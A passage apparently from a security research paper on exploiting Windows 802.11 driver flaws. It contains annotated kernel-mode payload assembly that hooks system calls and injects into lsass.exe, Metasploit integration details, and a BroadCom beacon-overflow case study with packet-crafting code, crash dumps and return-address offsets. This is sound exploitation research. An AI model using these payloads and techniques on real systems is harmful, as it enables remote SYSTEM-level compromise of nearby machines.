+accessible address of the unused portion of SharedUserData that the stage was
+copied into. After the hooking operation completes, all system calls invoked
+by user-mode processes will first go through the stage placed at 0x7ffe037c.
+The stager portion of the payload looks something like this (note, this
+implementation is only designed to work on XP SP2 and Windows 2003 Server SP1. 
+Modifications would need to be made to make it work on previous versions of XP
+and 2003):
+
+; Jump/Call to get the address of the stage
+00000000 EB38 jmp short 0x3a
+00000002 BB0103DFFF mov ebx,0xffdf0301
+00000007 4B dec ebx
+00000008 FC cld
+; Copy the stage into 0xffdf037c
+00000009 8D7B7C lea edi,[ebx+0x7c]
+0000000C 5E pop esi
+0000000D 6AXX push byte num_stage_dwords
+0000000F 59 pop ecx
+00000010 F3A5 rep movsd
+; Set edi to the address of the soon-to-be function pointer
+00000012 BF7C03FE7F mov edi,0x7ffe037c
+; Check to make sure the hook hasn't already been installed
+00000017 393B cmp [ebx],edi
+00000019 7409 jz 0x24
+; Grab SystemCall function pointer
+0000001B 8B03 mov eax,[ebx]
+0000001D 8D4B08 lea ecx,[ebx+0x8]
+; Store the existing value in 0x7ffe0308
+00000020 8901 mov [ecx],eax
+; Overwrite the existing function pointer and make things live!
+00000022 893B mov [ebx],edi
+
+; recovery stub here
+
+0000003A E8C3FFFFFF call 0x2
+
+; stage here
+
+With the hook in place, the stager has completed its primary task, which was to
+copy a stage into a location where it could be executed in the future. Before
+the stage can execute, the stager must allow the recovery component of the
+payload to execute. As mentioned previously, the recovery component
+represents one of the most vulnerability-specific portions of any kernel-mode
+payload. For the purpose of the exploits described in chapter 5, a
+special-purpose recovery component was necessary.
+
+This particular recovery component was required due to the fact that the
+example vulnerabilities are triggered in the context of the Idle thread. On
+Windows, the Idle thread is a special kernel thread that executes whenever a
+processor is idle. Due to the nature of the way the Idle thread operates,
+it's dangerous to perform operations like spinning the thread or any of the
+other recovery methods described in [1]. It may also be possible to apply the
+technique for delaying execution within the Idle thread as discussed in [2]. The
+recovery method that was finally selected involves two basic steps. First,
+the IRQL for the current processor is restored to DISPATCH level just in case
+it was executing at a higher IRQL. Second, execution control is transferred
+into the first instruction of nt!KiIdleLoop after initializing registers
+appropriately. The end effect is that the idle thread begins executing all
+over again and, if all goes well, the system continues operating as if nothing
+had happened. In practice, this recovery method has been proven reliable.
+However, the one negative that it has is that it requires knowledge of the
+address that nt!KiIdleLoop resides at. This dependence represents an area
+that is ripe for future improvement. Regardless of limitations, the recovery
+component for the payload looks like the code below:
+
+; Restore the IRQL
+00000024 31C0 xor eax,eax
+00000026 64C6402402 mov byte [fs:eax+0x24],0x2
+; Initialize assumed registers
+0000002B 8B1D1CF0DFFF mov ebx,[0xffdff01c]
+00000031 B827BB4D80 mov eax,0x804dbb27
+00000036 6A00 push byte +0x0
+; Transfer control to nt!KiIdleLoop
+00000038 FFE0 jmp eax
+
+After the recovery component has completed its execution, all of the payload
+code that was originally executing in kernel-mode is complete. The final
+portion of the payload that remains to be executed is the stage that was
+copied by the stager. The stage itself runs in user-mode within all process
+contexts, and it executes every time a system call is dispatched. 
The +implications of this should be obvious. Having a stage that executes within +every process every time a system call occurs is just asking for trouble. For +that reason, it makes sense to design a generic user-mode stage that can be +used to limit the times that it executes to one particular context. + +The approach that the authors took to meet this requirement is as follows. +First, the stage performs a check that is designed to see if it is running in +the context of a specific process. This check is there in order to help +ensure that the stage itself only executes in a known-good environment. As an +example, it would be a shame to take advantage of a kernel-mode vulnerability +only to finally execute code with the privileges of Guest. By default, this +check is designed to see if the stage is running within lsass.exe, a process +that runs with SYSTEM level privileges. If the stage is running within lsass, +it performs a check to see if the SpareBool attribute of the Process +Environment Block has been set to one. By default, this value is initialized +to zero in all processes. If the SpareBool attribute is set to zero, then the +stage proceeds to set the SpareBool attribute to one and then finishes by +executing whatever code is remaining within the stage. If the SpareBool +attribute is set to one, which means the stage has already run, or it's not +running within lsass, it transfers control back to the original system call +dispatching routine. This is necessary because it is still a requirement that +system calls from user-mode processes be dispatched appropriately, otherwise +the system itself would grind to a halt. An example of what this stage might +look like is shown below: + +; Preserve the calling environment +0000003F 60 pusha +00000040 6A30 push byte +0x30 +00000042 58 pop eax +00000043 99 cdq +00000044 648B18 mov ebx,[fs:eax] +; Check if Peb->Ldr is NULL +00000047 39530C cmp [ebx+0xc],edx +0000004A 7426 jz 0x72 +; Extract Peb->ProcessParameters->ImagePathName.Buffer +0000004C 8B5B10 mov ebx,[ebx+0x10] +0000004F 8B5B3C mov ebx,[ebx+0x3c] +; Add 0x28 to the image path name (skip past c:\windows\system32\) +00000052 83C328 add ebx,byte +0x28 +; Compare the name of the executable with lass +00000055 8B0B mov ecx,[ebx] +00000057 034B03 add ecx,[ebx+0x3] +0000005A 81F96C617373 cmp ecx,0x7373616c +; If it doesn't match, execute the original system call dispatcher +00000060 7510 jnz 0x72 +00000062 648B18 mov ebx,[fs:eax] +00000065 43 inc ebx +00000066 43 inc ebx +00000067 43 inc ebx +; Check if Peb->SpareBool is 1, if it is, execute the original +; system call dispatcher +00000068 803B01 cmp byte [ebx],0x1 +0000006B 7405 jz 0x72 +; Set Peb->SpareBool to 1 +0000006D C60301 mov byte [ebx],0x1 +; Jump into the continuation stage +00000070 EB07 jmp short 0x79 +; Restore the calling environment and execute the original system call +; dispatcher that was preserved in 0x7ffe0308 +00000072 61 popa +00000073 FF250803FE7F jmp near [0x7ffe0308] + +; continuation of the stage + +The culmination of these three payload components is a functional payload that +can be used in any situation where an exploit is triggered within the Idle +thread. If the exploit is triggered outside of the context of the Idle +thread, the recovery component can be swapped out with an alternative method +and the rest of the payload can remain unchanged. This is one of the benefits +of breaking kernel-mode payloads down into different components. 
To recap,
+the payload works by using a stager to copy a stage into an unused portion of
+SharedUserData. The stager then points the SystemCall attribute to that
+unused portion, effectively causing all user-mode processes to bounce through
+the stage when they attempt to make a system call. Once the stager has
+completed, the recovery component restores the IRQL to DISPATCH and then
+restarts the Idle thread. The kernel-mode portion of the payload is then
+complete. Shortly after that, the stage that was copied to SharedUserData is
+executed in the context of a specific user-mode process, such as lsass.exe.
+Once this occurs, the stage sets a flag that indicates that it's been executed
+and completes. All told, the payload itself is only 115 bytes, excluding any
+additional code in the stage.
+
+Given all of this infrastructure work, it's trivial to plug almost any
+user-mode payload into the stage. The additional code must simply be placed
+at the point where it's verified that it's running in a particular process and
+that it hasn't been executed before. The fact that this is so trivial was
+quite intentional. One of the major goals in implementing this payload system
+was to make it possible to use the existing set of payloads in the Metasploit
+framework in conjunction with any kernel-mode exploit. This includes even
+some of the more powerful payloads such as Meterpreter and VNC injection.
+
+There were two key elements involved in integrating kernel-mode payloads into
+the 3.0 version of the Metasploit Framework. The first had to do with
+defining the interface that exploit developers would need to use when writing
+kernel-mode exploits. The second dealt with defining the interface that
+end-users would have to be aware of when using kernel-mode exploits. In terms
+of precedence, defining the programming-level interfaces first is the ideal
+approach. To that point, the programming interface that was decided upon is
+one that should be pretty easy to use. The majority of the complexity
+involved in selecting a kernel-mode payload is hidden from the developer.
+There are only a few basic things that the developer needs to be aware of.
+
+When implementing a kernel-mode exploit in Metasploit 3.0, it is necessary to
+include the Msf::Exploit::KernelMode mixin. This mixin provides hints to the
+framework that make it aware of the fact that any payloads used with this
+exploit will need to be appropriately encapsulated within a kernel-mode
+stager. With this simple action, the majority of the work associated with the
+kernel-mode payload is abstracted away from the developer. The only other
+element that a developer may need to deal with is the process of defining
+extended parameters that are used to further control the process of selecting
+different aspects of the kernel-mode payload. These controllable parameters
+are exposed to developers through the ExtendedOptions hash element in an
+exploit's global or target-specific Payload options. An example of what this
+might look like within an exploit can be seen here:
+
+'Payload' =>
+{
+ 'ExtendedOptions' =>
+ {
+ 'Stager' => 'sud_syscall_hook',
+ 'Recovery' => 'idlethread_restart',
+ 'KiIdleLoopAddress' => 0x804dbb27,
+ }
+}
+
+In the above example, the exploit has explicitly selected the underlying
+stager component that should be used by specifying the Stager hash element.
+The sud_syscall_hook stager is a symbolic name for the stager that was described
+in section 4.1. 
The example above also has the exploit explicitly selecting the
+recovery component that should be used. In this case, the recovery component
+that is selected is idlethread_restart, which is a symbolic name for the
+recovery component described previously. Additionally, the nt!KiIdleLoop
+address is specified for use with this particular recovery component. Under
+the hood, the use of the KernelMode mixin and the additional extended options
+results in the framework encapsulating whatever user-mode payload the end-user
+specified inside of a kernel-mode stager. In the end, this process is
+entirely transparent to both the developer and the end-user.
+
+While the set of options that can be specified in the extended options hash
+will surely grow in the future, it makes sense to at least document the set of
+defined elements at the time of this writing. These options include:
+
+
+Recovery: Defines the recovery component that should be used when generating
+the kernel-mode payload. The current set of valid values for this option
+includes spin, which will spin the current thread, idlethread_restart, which
+will restart the Idle thread, or default, which is equivalent to spin. Over
+time, more recovery methods may be added. These can be found in recovery.rb.
+
+RecoveryStub: Defines a custom recovery component.
+
+Stager: Defines the stager component that should be used when generating the
+kernel-mode payload. The current set of valid values for this option includes
+sud_syscall_hook. Over time, more stager methods may be added. These can be
+found in stager.rb.
+
+UserModeStub: Defines the user-mode custom code that should be executed as
+part of the stage.
+
+RunInWin32Process: Currently only applicable to the sud_syscall_hook stager.
+This element specifies the name of the system process, such as lsass.exe, that
+should be injected into.
+
+KiIdleLoopAddress: Currently only applicable to the idlethread_restart recovery
+component. This element specifies the address of nt!KiIdleLoop.
+
+While not particularly important to developers or end-users, it may be
+interesting for some to understand how this abstraction works internally. To
+start things off, the KernelMode mixin overrides a base class method called
+encode_begin. This method is called when a payload that is used by an exploit
+is being encoded. When this happens, the mixin registers a procedure with the
+payload encoder, which calls it in the context of encapsulating the
+pre-encoded payload. The procedure itself is passed the original raw
+user-mode payload and the payload options hash (which contains the extended
+options, if any, that were specified in the exploit). It uses this
+information to construct the kernel-mode stager that is used to encapsulate
+the user-mode payload. If the procedure completes successfully, it returns a
+non-nil buffer that contains the original user-mode payload encapsulated
+within a kernel-mode stager. The kernel-mode stager and other components are
+actually contained within the payloads subsystem of the Rex library under
+lib/rex/payloads/win32/kernel.
+
+5) Case Studies
+
+This chapter describes three separate vulnerabilities that were found by the
+authors in real world 802.11 wireless device drivers. These three issues were
+found through a combination of fuzzing and manual analysis.
+
+5.1) BroadCom
+
+The first vulnerability that was subjected to the process described in this
+paper was an issue found in BroadCom's wireless device driver. 
This
+vulnerability was discovered by Chris Eagle as a result of his interest in
+doing some reversing of kernel-mode code. Chris noticed what appeared to be a
+conventional stack overflow in the way the BroadCom device driver handled
+beacon packets. As a result of this tip, a simple program was written that
+generated beacon packets with overly sized SSIDs. The code that was used to
+do this is shown below:
+
+int main(int argc, char **argv)
+{
+ Packet_80211 BeaconPacket;
+
+ CreatePacketForExploit(BeaconPacket, basic_target);
+
+ printf("Looping forever, sending packets.\n");
+
+ while(true)
+ {
+ int ret = Send80211Packet(&in_tx, BeaconPacket);
+ usleep(cfg.usleep);
+ if (ret == -1)
+ {
+ printf("Error tx'ing packet. Is interface up?\n");
+ exit(0);
+ }
+ }
+}
+
+void CreatePacketForExploit(Packet_80211 &P, struct target T)
+{
+ Packet_80211_mgmt Beacon;
+ u_int8_t bcast_addy[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
+ Packet_80211_mgmt_Crafter MgmtCrafter(bcast_addy, cfg.src, cfg.bssid);
+ MgmtCrafter.craft(8, Beacon); // 8 = beacon
+ P = Beacon;
+ printf("\n");
+
+ if (T.payload_size > 255)
+ {
+ printf("invalid target. payload sizes > 255 won't fit in a single IE\n");
+ exit(0);
+ }
+
+ u_int8_t fixed_parameters[12] = {
+ '_', ',', '.', 'j', 'c', '.', ',', '_', // timestamp (8 bytes)
+ 0x64, 0x00, // beacon interval, 0.1024 secs
+ 0x11, 0x04 // capability information. ESS, WEP, Short slot time
+ };
+
+ P.AppendData(sizeof(fixed_parameters), fixed_parameters);
+
+ u_int8_t SSID_ie[257]; //255 + 2 for type, length
+ u_int8_t *SSID = SSID_ie + 2;
+
+ SSID_ie[0] = 0;
+ SSID_ie[1] = 255;
+
+ memset(SSID, 0x41, 255);
+
+ //Okay, SSID IE is ready for appending.
+ P.AppendData(sizeof(SSID_ie), SSID_ie);
+ P.print_hex_dump();
+}
+
+As a result of running this code, 802.11 beacon packets were produced that did
+indeed contain overly sized SSIDs. However, these packets appeared to have no
+effect on the BroadCom device driver. After considerable head scratching, a
+modification was made to the program to see if a normally sized SSID would
+cause the device driver to process it. If it were processed, it would mean
+that the fake SSID would show up in the list of available networks. Even
+after making this modification, the device driver still did not appear to be
+processing the manually crafted 802.11 beacon packets. Finally, it was
+realized that the driver might have some checks in place such that it would
+only process beacon packets from networks that also respond to 802.11 probes.
+To test this theory out, the code was changed in the manner shown below:
+
+CreatePacketForExploit(BeaconPacket, basic_target);
+
+//CreatePacket returns a beacon, we will also send out directed probe responses.
+Packet_80211 ProbePacket = BeaconPacket;
+
+ProbePacket.wlan_header->subtype = 5; //probe response.
+ProbePacket.setDstAddr(cfg.dst);
+
+...
+
+while(true)
+{
+ int ret = Send80211Packet(&in_tx, BeaconPacket);
+ usleep(cfg.usleep);
+ ret = Send80211Packet(&in_tx, ProbePacket);
+ usleep(2*cfg.usleep);
+}
+
+Sending out directed probe responses as well as beacon packets caused results
+to be generated immediately. When a small SSID was sent, it would suddenly
+show up in the list of available wireless networks. When an overly sized SSID
+was sent, it resulted in a much desired bluescreen as a result of the stack
+overflow that Chris had identified. 
The following output shows some of the +crash information associated with transmitting an SSID that consisted of 255 +0xCC's: + +DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) +An attempt was made to access a pageable (or completely invalid) address at an +interrupt request level (IRQL) that is too high. This is usually +caused by drivers using improper addresses. +If kernel debugger is available get stack backtrace. +Arguments: +Arg1: ccccfe9d, memory referenced +Arg2: 00000002, IRQL +Arg3: 00000000, value 0 = read operation, 1 = write operation +Arg4: f6e713de, address which referenced memory +... +TRAP_FRAME: 80550004 -- (.trap ffffffff80550004) +ErrCode = 00000000 +eax=cccccccc ebx=84ce62ac ecx=00000000 edx=84ce62ac esi=805500e0 edi=84ce6308 +eip=f6e713de esp=80550078 ebp=805500e0 iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 +bcmwl5+0xf3de: +f6e713de f680d131000002 test byte ptr [eax+31D1h],2 ds:0023:ccccfe9d=?? +... +kd> k v + *** Stack trace for last set context - .thread/.cxr resets it +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +805500e0 cccccccc cccccccc cccccccc cccccccc bcmwl5+0xf3de +80550194 f76a9f09 850890fc 80558e80 80558c20 0xcccccccc +805501ac 804dbbd4 850890b4 850890a0 00000000 NDIS!ndisMDpcX+0x21 (FPO: [Non-Fpo]) +805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 (FPO: [0,0,0]) +805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 (FPO: [0,0,0]) + +In this case, the crash occurred because a variable on the stack was +overwritten that was subsequently used as a pointer. This overwritten +pointer was then dereferenced. In this case, the dereference occurred through +the eax register. Although the crash occurred as a result of the dereference, +it's important to note that the return address for the stack frame was +successfully overwritten with a controlled value of 0xcccccccc. If the +function had been allowed to return cleanly without trying to dereference +corrupted pointers, full control of the instruction pointer would have been +obtained. + +In order to avoid this crash and gain full control of the instruction pointer, +it's necessary to try to calculate the offset to the return address from the start +of the buffer that is being transmitted. Figuring out this offset also has +the benefit of making it possible to figure out the minimum number of bytes +necessary to transmit to trigger the overflow. This is important because it +may be useful when it comes to preventing the dereference crash that was seen +previously. + +There are many different ways in which the offset of the return address can be +determined. In this situation, the simplest way to go about it is to transmit +a buffer that contains an incrementing array of bytes. For instance, byte +index 0 is 0x00, byte index 1 is 0x01, and so on. The value that the return +address is overwritten with will then make it possible to calculate its offset +within the buffer. After transmitting a packet that makes use of this +technique, the following crash is rendered: + +DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) +An attempt was made to access a pageable (or completely invalid) address at an +interrupt request level (IRQL) that is too high. This is usually +caused by drivers using improper addresses. +If kernel debugger is available get stack backtrace. 
+Arguments: +Arg1: 605f902e, memory referenced +Arg2: 00000002, IRQL +Arg3: 00000000, value 0 = read operation, 1 = write operation +Arg4: f73673de, address which referenced memory +... +STACK_TEXT: +80550004 f73673de badb0d00 84d8b250 80550084 nt!KiTrap0E+0x233 +WARNING: Stack unwind information not available. Following frames may be wrong. +805500e0 5c5b5a59 605f5e5d 64636261 68676665 bcmwl5+0xf3de +80550194 f76a9f09 84e9e0fc 80558e80 80558c20 0x5c5b5a59 +805501ac 804dbbd4 84e9e0b4 84e9e0a0 00000000 NDIS!ndisMDpcX+0x21 +805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 +805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 + +From this stack trace, it can be seen that the return address was overwritten +with 0x5c5b5a59. Since byte-ordering on x86 is little endian, the offset +within the buffer that contains the SSID is 0x59. + +With knowledge of the offset at which the return address is overwritten, the +next step becomes figuring out where in the buffer to place the arbitrary code +that will be executed. Before going down this route, it's important to +provide a little bit of background on the format of 802.11 Management packets. +Management packets encode all of their information in what the standard calls +Information Elements (IEs). IEs have a one byte identifier followed by a one +byte length which is subsequently followed by the associated IE data. For +those familiar with Type-Length-Value (TLV), IEs are roughly the same thing. +Based on this definition, the largest possible IE is 257 bytes (2 bytes of +overhead, and 255 bytes of data). + +The upshot of the size restrictions associated with an IE means that the +largest possible SSID that can be copied to the stack is 255 bytes. When +attempting to find the offset of the return address on the stack, an SSID IE +was sent with a 255 byte SSID. Considering the fact that a stack overflow +occurred, one might reasonably expect to find the entire 255 byte SSID on the +stack as a result of the overflow that occurred. A quick dump of the stack +can be used to validate this assumption: + +kd> db esp L 256 +80550078 2e f0 d9 84 0c 80 d8 84-00 80 d8 84 00 07 0e 01 ................ +80550088 02 03 ff 00 01 02 03 04-05 06 07 08 09 0a 0b 0c ................ +80550098 0d 0e 0f 10 11 12 13 14-15 16 17 18 19 1a 1b 1c ................ +805500a8 1d 1e 1f 20 21 22 23 24-25 26 0b 28 0c 00 00 00 ... !"#$%&.(.... +805500b8 82 84 8b 96 24 30 48 6c-0c 12 18 60 44 00 55 80 ....$0Hl...`D.U. +805500c8 3d 3e 3f 40 41 42 43 44-45 46 01 02 01 02 4b 4c =>?@ABCDEF....KL +805500d8 4d 01 02 50 51 52 53 54-55 56 57 58 59 5a 5b 5c M..PQRSTUVWXYZ[\ +805500e8 5d 5e 5f 60 61 62 63 64-65 66 67 68 69 6a 6b 6c ]^_`abcdefghijkl +805500f8 6d 6e 6f 70 71 72 73 74-75 76 77 78 79 7a 7b 7c mnopqrstuvwxyz{| +80550108 7d 7e 7f 80 81 82 83 84-85 86 87 88 89 8a 8b 8c }~.............. +80550118 8d 8e 8f 90 91 92 93 94-95 96 97 98 99 9a 9b 9c ................ +80550128 9d 9e 9f a0 a1 a2 a3 a4-a5 a6 a7 a8 a9 aa ab ac ................ +80550138 ad ae af b0 b1 b2 b3 b4-b5 b6 b7 b8 b9 ba bb bc ................ +80550148 bd be bf c0 c1 c2 c3 c4-c5 c6 c7 c8 c9 ca cb cc ................ +80550158 cd ce cf d0 d1 d2 d3 d4-d5 d6 d7 d8 d9 da db dc ................ +80550168 dd de df e0 e1 e2 e3 e4-e5 e6 e7 e8 e9 ea eb ec ................ +80550178 ed ee ef f0 f1 f2 f3 f4-f5 f6 f7 f8 f9 fa fb fc ................ +80550188 fd fe e9 84 00 00 00 00-e0 9e 6a 01 ac 01 55 80 ..........j...U. 
+ +Based on this dump, it appears that the majority of the SSID was indeed copied +across the stack. However, a large portion of the buffer prior to the offset +of the return address has been mangled. In this instance, the return address +appears to be located at 0x805500e4. While the area prior to this address +appears mangled, the area succeeding it has remained intact. + +In order to try to prove the possibility of gaining code execution, a good +initial attempt would be to send a buffer that overwrites the return address +with the address that immediately succeeds it (which will be composed of +int3's). If everything works according to plan, the vulnerable function will +return into the int3's and bluescreen the machine in a controlled fashion. +This accomplishes two things. First, it proves that it is possible to +redirect execution into a controllable buffer. Second, it gives a snapshot of +the state of the registers at the time that execution control is redirected. +The layout of the buffer that would need to be sent to trigger this condition +is described in the diagram below: + +[Padding.......][EIP][payload of int3's] + ^ ^ ^ + | | \_ Can hold at most 163 bytes of arbitrary code. + | \_ Overwritten with 0x8055010d which points to the payload + \_ Start of SSID that is mangled after the overflow occurs. + +Transmitting a buffer that is structured as shown above does indeed result in +a bluescreen. It is possible to differentiate actual crashes from those +generated as the result of an int3 by looking at the bugcheck information. +The use of an int3 will result in an unhandled kernel mode exception which is +bugcheck code 0x8e. Furthermore, the exception code information associated +with this (the first parameter of the exception) will be set to 0x80000003. +Exception code 0x80000003 is used to indicate that the unhandled exception was +associated with a trap instruction. This is generally a good indication that +the arbitrary code you specified has executed. It's also very useful in +situations where it is not possible to do remote kernel debugging and one must +rely on strictly using crash dump analysis. + +KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e) +This is a very common bugcheck. Usually the exception address pinpoints +the driver/function that caused the problem. Always note this address +as well as the link date of the driver/image that contains this address. +Some common problems are exception code 0x80000003. This means a hard +coded breakpoint or assertion was hit, but this system was booted +/NODEBUG. This is not supposed to happen as developers should never have +hardcoded breakpoints in retail code, but ... +If this happens, make sure a debugger gets connected, and the +system is booted /DEBUG. This will let us see why this breakpoint is +happening. +Arguments: +Arg1: 80000003, The exception code that was not handled +Arg2: 8055010d, The address that the exception occurred at +Arg3: 80550088, Trap Frame +Arg4: 00000000 +... +TRAP_FRAME: 80550088 -- (.trap ffffffff80550088) +ErrCode = 00000000 +eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e +eip=8055010e esp=805500fc ebp=8055010d iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 +nt!KiDoubleFaultStack+0x2c8e: +8055010e cc int 3 +... 
+
+STACK_TEXT:
+8054fc50 8051d6a7 0000008e 80000003 8055010d nt!KeBugCheckEx+0x1b
+80550018 804df235 80550034 00000000 80550088 nt!KiDispatchException+0x3b1
+80550080 804df947 8055010d 8055010e badb0d00 nt!CommonDispatchException+0x4d
+80550080 8055010e 8055010d 8055010e badb0d00 nt!KiTrap03+0xad
+8055010d cccccccc cccccccc cccccccc cccccccc nt!KiDoubleFaultStack+0x2c8e
+WARNING: Frame IP not in any known module. Following frames may be wrong.
+80550111 cccccccc cccccccc cccccccc cccccccc 0xcccccccc
+80550115 cccccccc cccccccc cccccccc cccccccc 0xcccccccc
+80550119 cccccccc cccccccc cccccccc cccccccc 0xcccccccc
+8055011d cccccccc cccccccc cccccccc cccccccc 0xcccccccc
+
+The above crash dump information definitely shows that arbitrary code
+execution has been achieved. This is a big milestone. It pretty much proves
+that exploitation will be possible. However, it doesn't prove how reliable or
+portable it will be. For that reason, the next step involves identifying
+changes to the exploit that will make it more reliable and portable from one
+machine to the next. Fortunately, the current situation already appears as
+though it might afford a good degree of portability, as the stack addresses
+don't appear to shift around from one crash to the next.
+
+At this stage, the return address is being overwritten with a hard-coded stack
+address that points immediately after the return address in the buffer. One
+of the problems with this is that the amount of space immediately following
+the return address is limited to 163 bytes due to the maximum size of the SSID
+IE. This is enough room for a small stub of a payload, but probably not large
+enough for a payload that would provide anything interesting in terms of
+features. It's also worth noting that overwriting past the return address
+might overwrite some important elements on the stack that could lead to the
+system crashing at some later point for hard-to-explain reasons. When dealing
+with kernel-mode vulnerabilities, it is advised that one attempt to clobber
+as little state as possible in order to reduce the amount of collateral
+damage that might ensue.
+
+Limiting the amount of data that is used in the overflow to only the amount
+needed to trigger the overwriting of the return address means that the total
+size for the SSID IE will be limited and not suitable to hold arbitrary code.
+However, there's no reason why code couldn't be placed in a completely
+separate IE unrelated to the SSID. This means we could transmit a packet that
+included both the bogus SSID IE and another arbitrary IE which would be used
+to contain the arbitrary code. Although this would work, it must be possible
+to find a reference to the arbitrary IE that contains the arbitrary code. One
+approach that might be taken to do this would be to search the address space
+for an intact copy of the 802.11 packet that is transmitted. Before going
+down that path, it makes sense to try to find instances of the packet in
+memory using the kernel debugger. A simple search of the address space using
+the destination MAC address of the packet sent is a good way to find potential
+matches. In this case, the destination MAC is 00:14:a5:06:8f:e6.
+
+kd> .ignore_missing_pages 1
+Suppress kernel summary dump missing page error message
+kd> s 0x80000000 L?10000000 00 14 a5 06 8f e6
+8418588a 00 14 a5 06 8f e6 ff ff-ff ff ff ff 40 0e 00 00 ............@...
+841b0006 00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00 ................ 
+841b1534 00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00 ................
+84223028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................
+845dc028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................
+845de828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................
+845df828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................
+845f3028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................
+845f3828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................
+845f4028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................
+845f5028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................
+84642d4c 00 14 a5 06 8f e6 00 00-f0 c6 2a 85 00 00 00 00 ..........*.....
+846d6d4c 00 14 a5 06 8f e6 00 00-80 79 21 85 00 00 00 00 .........y!.....
+84eda06c 00 14 a5 06 8f e6 02 06-01 01 00 0e 00 00 00 00 ................
+84efdecc 00 14 a5 06 8f e6 00 00-65 00 00 00 16 00 25 0a ........e.....%.
+
+The above output shows that quite a few matches were found. One important thing
+to note is that the BSSID used in the packet that contained the overly sized
+SSID was 00:07:0e:01:02:03. In an 802.11 header, the addresses of Management
+packets are arranged in order of DST, SRC, BSSID. While some of the above
+matches do not appear to contain the entire packet contents, many of them do.
+Picking one of the matches at random shows the contents in more detail:
+
+kd> db 84223028 L 128
+84223028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................
+84223038 02 03 d0 cf 85 b1 b3 db-01 00 00 00 64 00 11 04 ............d...
+84223048 00 ff 4a 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d ..J..U...U...U..
+84223058 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U..
+84223068 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U..
+84223078 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U..
+84223088 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U..
+84223098 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U..
+842230a8 01 55 80 cc cc cc cc cc-cc cc cc cc cc cc cc cc .U..............
+842230b8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
+842230c8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
+842230d8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
+842230e8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
+842230f8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
+84223108 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
+
+Indeed, this does appear to be a full copy of the original packet. The reason
+why there are so many copies of the packet in memory might be related to the
+fact that the current form of the exploit is transmitting packets in an
+infinite loop, thus causing the driver to have a few copies lingering in
+memory. The fact that multiple copies exist in memory is good news
+considering it increases the number of places that could be used for return
+addresses. However, it's not as simple as hard-coding one of these addresses
+into the exploit considering pool-allocated addresses will not be predictable.
+Instead, steps will need to be taken to attempt to find a reference to the
+packet through a register or through some other context. In this way, a very
+small stub could be placed after the return address in the buffer that would
+immediately transfer control into a copy of the packet somewhere else in
+memory. 
Although some initial work with the debugger showed a couple of
+references to the original packet on the stack, a much simpler solution was
+identified. Consider the following register context at the time of the crash:
+
+kd> r
+Last set context:
+eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e
+eip=8055010e esp=805500fc ebp=8055010d iopl=0 nv up ei pl zr na pe nc
+cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246
+nt!KiDoubleFaultStack+0x2c8e:
+8055010e cc int 3
+
+Inspecting each of these registers individually eventually shows that the edi
+register is pointing into a copy of the packet.
+
+kd> db edi
+845f302e 00 07 0e 01 02 03 00 07-0e 01 02 03 10 cf 85 b1 ................
+845f303e b3 db 01 00 00 00 64 00-11 04 00 ff 4a 0d 01 55 ......d.....J..U
+845f304e 80 0d 01 55 80 0d 01 55-80 0d 01 55 80 0d 01 55 ...U...U...U...U
+
+As chance would have it, edi is pointing to the source MAC in the 802.11
+packet that was sent. If it had instead been pointing to the destination MAC
+or the end of the packet, it would not have been of any use. With edi
+pointing to the source MAC, the rest of the cards fall into place. The
+hard-coded stack address that was previously used to overwrite the return
+address can be replaced with an address (probably inside ntoskrnl.exe) that
+contains the equivalent of a jmp edi instruction. When the exploit is
+triggered and the vulnerable function returns, it will transfer control to the
+location that contains the jmp edi. The jmp edi, in turn, transfers control
+to the first byte of the source MAC. By setting the source MAC to some
+executable code, such as a relative jump instruction, it is possible to
+finally transfer control into a location of the packet that contains the
+arbitrary code that should be executed.
+
+This solves the problem of using the hard-coded stack address as the return
+address and should help to make the exploit more reliable and portable between
+targets. However, this portability will be limited by the location of the jmp
+edi instruction that is used when overwriting the return address. Finding the
